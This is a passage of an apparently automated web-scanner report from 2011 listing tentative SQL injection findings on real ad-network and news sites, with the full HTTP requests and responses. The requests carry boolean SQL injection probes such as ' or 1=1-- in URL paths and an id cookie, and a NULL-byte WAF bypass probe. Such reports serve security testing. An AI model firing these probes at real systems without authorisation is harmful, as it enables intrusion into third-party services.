NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d852149/4%00'/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:27:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d852149/4%00''/864449/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 17:30:48 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 301

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d852149/4 was not found on this server.</p>
<hr
...[SNIP]...

1.6. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11180680'%20or%201%3d1--%20 and 11180680'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html11180680'%20or%201%3d1--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 241
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=1-- was not
...[SNIP]...
</p>
</body></html>

Request 2

GET /static/rtb/sync-min.html11180680'%20or%201%3d2--%20 HTTP/1.1
Host: assets.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; put_1994=6ch47d7o8wtv; pup_w55c=1296073239463; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; pup_2025=1296224125224; pup_1512=1296224128533; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; pup_1430=1296224129445; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_fimserve=1296224133489; pup_1902=1296226099073; pup_2081=1296226100651; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; put_2081=CA-00000000456885722; pup_2101=1296226106985; lm="28 Jan 2011 14:48:45 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; pup_2084=1296226112564; pup_1185=1296226114213; pup_1986=1296226114410; put_1185=3011330574290390485; pup_2132=1296226115755; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2100=1296226117318; put_2100=usr3fd748acf5bcab14; pup_1197=1296232890383; pup_rubicon=1296232891481; put_1197=3297869551067506954; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; khaos=GIPAEQ2D-C-IOYY; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; ses9=9320^1&7531^1; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; cd=false; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7665/13236; rdk2=0; ses2=7531^1&13236^1; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 332
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html11180680' or 1=2-- was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

1.7. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77927196'%20or%201%3d1--%20 and 77927196'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /static/rtb/sync-min.html77927196'%20or%201%3d1--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 333
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=1-- / was not
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/rtb/sync-min.html77927196'%20or%201%3d2--%20/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 242
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/rtb/sync-min.html77927196' or 1=2-- / was not
...[SNIP]...
</p>
</body></html>

1.8. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 [id cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the id cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d1--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 1

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3192
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1010594923?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1010594923/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=1010594923?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*100
...[SNIP]...

Request 2

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380'%20and%201%3d2--%20; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response 2

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:42:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3174
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=71084410?">\n');
document.write ('</SCRIPT>\n');
document.write ('<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/71084410/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=71084410?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>\n');
document.write ('</NOSCRIPT>\n');
document.write ('</IFRAME>\n');
document.write ('<SCRIPT TYPE="text/javascript" language="JavaScript">\n');
document.write ('var B3d=new Date();\n');
document.write ('var B3m=B3d.getTime();\n');
document.write ('B3d.setTime(B3m+30*24*60*60*1000);\n');
docum
...[SNIP]...

1.9. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://english.aljazeera.net
Path:   /news/middleeast/2011/01/201113085252994161.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /news'%20and%201%3d1--%20/middleeast/2011/01/201113085252994161.html HTTP/1.1
Host: english.aljazeera.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Sun, 30 Jan 2011 14:52:15 GMT
Expires: Sun, 30 Jan 2011 14:52:15 GMT
Date: Sun, 30 Jan 2011 14:52:15 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public, max-age=360
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gegnmk55z3ufcfy344ht1a45; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 64156
X-Cache: MISS from 12.120.11.62
Via: 1.1 12.120.11.62:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Egypt shuts down Al Jazeera bureau - Middle East - Al Jazeera English
</title><meta name="ROBOTS" content=" FOLLOW,INDEX" /><meta id="ctl00_meta1" name="description" content="Network's licences cancelled and accreditation of staff in Cairo withdrawn by order of information minister." /><meta name="keywords" content="Aljazeera, Al Jazeera, News, Middle east, Africa, Asia, Asia Pacific, Europe, Sports, Business, Special reports" /><meta http-equiv="CACHE-CONTROL" content="Public" /><meta id="ctl00_metaDate" http-equiv="Last-Modified" content="Sun, 30 Jan 2011 02:51:59 GMT" /><link href="/Styles/Templates2.css" rel="stylesheet" type="text/css" /><link href="/Styles/SiteMenu.css" rel="stylesheet" type="text/css" />
<script src="/Scripts/SiteMenu.js" type="text/javascript"></script>
<script src="/Scripts/Common.js" type="text/javascript"></script>
<script src="/Scripts/SiteScripts.js" type="text/javascript"></script>
<script src="/Scripts/ajax.js" type="text/javascript"></script>
<script src="/Scripts/AddthisSettings.js" type="text/javascript"></script>
